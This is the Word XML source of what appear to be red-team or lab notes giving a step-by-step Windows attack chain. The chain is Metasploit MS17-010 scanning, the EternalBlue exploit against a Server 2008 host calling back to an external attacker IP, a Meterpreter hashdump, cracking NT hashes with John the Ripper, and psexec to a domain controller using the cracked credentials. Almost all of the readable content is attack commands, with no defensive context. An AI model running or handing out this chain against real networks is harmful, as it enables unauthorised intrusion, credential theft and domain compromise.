    <w:p w14:paraId="31A45BE2" w14:textId="6F75D926" w:rsidR="008124F5" w:rsidRPr="00914F81" w:rsidRDefault="008124F5" w:rsidP="001C42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Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17187361" w14:textId="6E9A390C" w:rsidR="008124F5" w:rsidRDefault="008124F5" w:rsidP="00380E7F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Set RHOST &lt;</w:t>
      </w:r>
      <w:r w:rsidR="0063635E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Server2008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IP&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009F80B6" w14:textId="51691A58" w:rsidR="00782243" w:rsidRPr="00782243" w:rsidRDefault="00782243" w:rsidP="00782243">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00782243">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>In Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A1D302" w14:textId="784C8466" w:rsidR="001C4268" w:rsidRPr="00782243" w:rsidRDefault="001C4268" w:rsidP="0078224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782243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msf&gt; Use auxiliary/scanner/smb/smb_ms17_010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6828EB89" w14:textId="77777777" w:rsidR="001C4268" w:rsidRPr="00914F81" w:rsidRDefault="001C4268" w:rsidP="001C42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Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E0D1B2" w14:textId="4F0CCF21" w:rsidR="001C4268" w:rsidRPr="00380E7F" w:rsidRDefault="001C4268" w:rsidP="00380E7F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Set RHOST &lt;</w:t>
      </w:r>
      <w:r w:rsidR="0063635E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Server2008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IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8871F9" w14:textId="06CA06D6" w:rsidR="001C4268" w:rsidRDefault="001C4268" w:rsidP="001C42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Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F74EFED" w14:textId="2373F9BF" w:rsidR="005B1A95" w:rsidRPr="005B1A95" w:rsidRDefault="005B1A95" w:rsidP="005B1A95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00782243">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>In Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ED3A29" w14:textId="19C755F3" w:rsidR="001C4268" w:rsidRPr="00782243" w:rsidRDefault="001C4268" w:rsidP="00782243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782243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msf&gt; use exploit/windows/smb/ms17_010_</w:t>
      </w:r>
      <w:r w:rsidR="005A0DC3" w:rsidRPr="00782243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eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE86996" w14:textId="71271804" w:rsidR="001C4268" w:rsidRPr="00914F81" w:rsidRDefault="001C4268" w:rsidP="001C426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4F81">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0B793B" w14:textId="6B3C06FF" w:rsidR="001C4268" w:rsidRPr="00380E7F" w:rsidRDefault="001C4268" w:rsidP="00380E7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Set RHOST &lt;</w:t>
      </w:r>
      <w:r w:rsidR="0063635E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Server2008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IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D149DE" w14:textId="4E1E2156" w:rsidR="001C4268" w:rsidRDefault="001C4268" w:rsidP="00380E7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Set LHOST &lt;</w:t>
      </w:r>
      <w:r w:rsidR="009D04B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RedTeam External</w:t>
      </w:r>
      <w:r w:rsidR="00AF5092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IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00380E7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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F1AC5E" w14:textId="369D3A4B" w:rsidR="00BB23C1" w:rsidRDefault="00BB23C1" w:rsidP="00BB23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--------------------------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Hash Dump Server 2008 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00CA737A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4645BAB7" w14:textId="6B3BAE16" w:rsidR="00CA737A" w:rsidRPr="009D12BF" w:rsidRDefault="00CA737A" w:rsidP="009D12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D12BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>In Meterpreter shell for Windows Server 2008 Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B927ED2" w14:textId="7CDE6EA0" w:rsidR="00CA737A" w:rsidRDefault="00CA737A" w:rsidP="00CA737A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CA737A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run post/windows/gather/hashdump </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C46E263" w14:textId="4BCD3988" w:rsidR="00CA737A" w:rsidRPr="009D12BF" w:rsidRDefault="00CA737A" w:rsidP="009D12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D12BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Copy Hashes to a text document on your host machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DD8F3F" w14:textId="2364CFF9" w:rsidR="00CA737A" w:rsidRPr="00CA737A" w:rsidRDefault="00CA737A" w:rsidP="00CA737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3C627B3" w14:textId="439767A0" w:rsidR="00CA737A" w:rsidRPr="00CA737A" w:rsidRDefault="00CA737A" w:rsidP="00CA737A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA737A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>----------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA737A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-----------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-------</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA737A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-----</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Crack Hashes -----------</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA737A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-------------------------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD75CDB" w14:textId="76E7C12F" w:rsidR="009D12BF" w:rsidRDefault="005D24E4" w:rsidP="005D24E4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 host machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EB0DFA" w14:textId="46C8ECE2" w:rsidR="005D24E4" w:rsidRDefault="005D24E4" w:rsidP="005D24E4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5D24E4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john </w:t>
      </w:r>
      <w:r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&lt;hash file&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005D24E4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 --format=NT -wordlist=</w:t>
      </w:r>
      <w:r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&lt;wordlist&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253472AB" w14:textId="35147545" w:rsidR="00E1282B" w:rsidRPr="00E1282B" w:rsidRDefault="00E1282B" w:rsidP="00E1282B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8F8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="160704B1" w14:textId="3634AB2B" w:rsidR="009D12BF" w:rsidRPr="00E1282B" w:rsidRDefault="00E1282B" w:rsidP="00E1282B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E1282B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>**If available, use a more powerful cracking program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (eg. Coalfire Labs NPK Hash Cracking)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E1282B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E72F85" w14:textId="61A54E24" w:rsidR="002F7C62" w:rsidRPr="002F7C62" w:rsidRDefault="002F7C62" w:rsidP="002F7C62">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA737A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>----------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA737A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA737A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-----</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploit Domain Controller</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -----------</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA737A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2841A4ED" w14:textId="6F58BF39" w:rsidR="001A57BB" w:rsidRDefault="001A57BB" w:rsidP="001A57B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 msfconsole</w:t>
      </w:r>
      <w:r w:rsidR="00E516E3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> on host machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01276FC8" w14:textId="77777777" w:rsidR="001A57BB" w:rsidRPr="001A57BB" w:rsidRDefault="001A57BB" w:rsidP="00B0162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1A57BB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use exploit/windows/smb/psexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F805E0" w14:textId="13E443B4" w:rsidR="001A57BB" w:rsidRPr="001A57BB" w:rsidRDefault="001A57BB" w:rsidP="00B0162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1A57BB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msf exploit windows/smb/psexec) &gt; set rhost </w:t>
      </w:r>
      <w:r w:rsidR="00B0162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&lt;DC IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26064163" w14:textId="001E0241" w:rsidR="001A57BB" w:rsidRPr="001A57BB" w:rsidRDefault="001A57BB" w:rsidP="00B0162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1A57BB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msf exploit(windows/smb/psexec) &gt; set smbuser </w:t>
      </w:r>
      <w:r w:rsidR="00B0162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&lt;Cracked user&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59073E31" w14:textId="7C719F42" w:rsidR="001A57BB" w:rsidRPr="001A57BB" w:rsidRDefault="001A57BB" w:rsidP="00B0162F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1A57BB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 xml:space="preserve">msf exploit(windows/smb/psexec) &gt; set smbpass </w:t>
      </w:r>
      <w:r w:rsidR="00B0162F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&lt;Cracked pass&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033E8E09" w14:textId="543359AA" w:rsidR="008F186D" w:rsidRPr="002F7C62" w:rsidRDefault="001A57BB" w:rsidP="002F7C62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/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</w:pPr>
      <w:r w:rsidRPr="001A57BB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4C4F53"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7F8F8"/>
        </w:rPr>
        <w:t>msf exploit(windows/smb/psexec) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008F186D" w:rsidRPr="002F7C62" w:rsidSect="00BC0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7BE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E01C3D5E"/>
    <w:lvl w:ilvl="0" w:tplc="C38A25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96E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="364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6BA4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A9C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1799"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B21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48A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6B1E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04032"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B508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B1C35"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E86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21B89"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04A8F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13283C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F8F0A79C"/>
    <w:lvl w:ilvl="0" w:tplc="309E6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E0094"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C29C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E5D70"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C3C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17208"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B56E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64E76"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="35C0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74569"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E08A9490"/>
    <w:lvl w:ilvl="0" w:tplc="03ECC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70"/>
    <w:rsid w:val="0013577E"/>
    <w:rsid w:val="001867D7"/>
    <w:rsid w:val="0019034A"/>
    <w:rsid w:val="001A57BB"/>
    <w:rsid w:val="001C4268"/>
    <w:rsid w:val="00285F53"/>
    <w:rsid w:val="002C69CB"/>
    <w:rsid w:val="002E2566"/>
    <w:rsid w:val="002F7C62"/>
    <w:rsid w:val="00380E7F"/>
    <w:rsid w:val="003C5A25"/>
    <w:rsid w:val="004E41DF"/>
    <w:rsid w:val="0050439B"/>
    <w:rsid w:val="005467C3"/>
    <w:rsid w:val="00576170"/>
    <w:rsid w:val="005A0DC3"/>
    <w:rsid w:val="005B1A95"/>
    <w:rsid w:val="005D24E4"/>
    <w:rsid w:val="0063635E"/>
    <w:rsid w:val="006645C7"/>
    <w:rsid w:val="0068067D"/>
    <w:rsid w:val="00687FA3"/>
    <w:rsid w:val="006B1440"/>
    <w:rsid w:val="007051C3"/>
    <w:rsid w:val="007235EB"/>
    <w:rsid w:val="00782243"/>
    <w:rsid w:val="007C16F2"/>
    <w:rsid w:val="008124F5"/>
    <w:rsid w:val="008255B6"/>
    <w:rsid w:val="008C0E67"/>
    <w:rsid w:val="008F186D"/>
    <w:rsid w:val="008F2BB4"/>
    <w:rsid w:val="00914F81"/>
    <w:rsid w:val="00926BAF"/>
    <w:rsid w:val="0094083B"/>
    <w:rsid w:val="00942C2C"/>
    <w:rsid w:val="00943AF9"/>
    <w:rsid w:val="009568EB"/>
    <w:rsid w:val="009A7205"/>
    <w:rsid w:val="009D04BA"/>
    <w:rsid w:val="009D12BF"/>
    <w:rsid w:val="009F7282"/>
    <w:rsid w:val="00A31626"/>
    <w:rsid w:val="00AF5092"/>
    <w:rsid w:val="00B0162F"/>
    <w:rsid w:val="00BB23C1"/>
    <w:rsid w:val="00BC0434"/>
    <w:rsid w:val="00C06364"/>
    <w:rsid w:val="00C72099"/>
    <w:rsid w:val="00CA529B"/>
    <w:rsid w:val="00CA737A"/>
    <w:rsid w:val="00E06493"/>
    <w:rsid w:val="00E1282B"/>
    <w:rsid w:val="00E13012"/>
    <w:rsid w:val="00E36F52"/>
    <w:rsid w:val="00E516E3"/>
    <w:rsid w:val="00E8371C"/>
    <w:rsid w:val="00ED096C"/>
    <w:rsid w:val="00F47757"/>
    <w:rsid w:val="00F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827F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{47CAAC4F-A462-4C40-9306-77632187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baltstrike.com/help-socks-proxy-pivot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Hamilton</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Austin Hamilton</cp:lastModifiedBy>
  <cp:revision>57</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-09T13:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-12T12:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>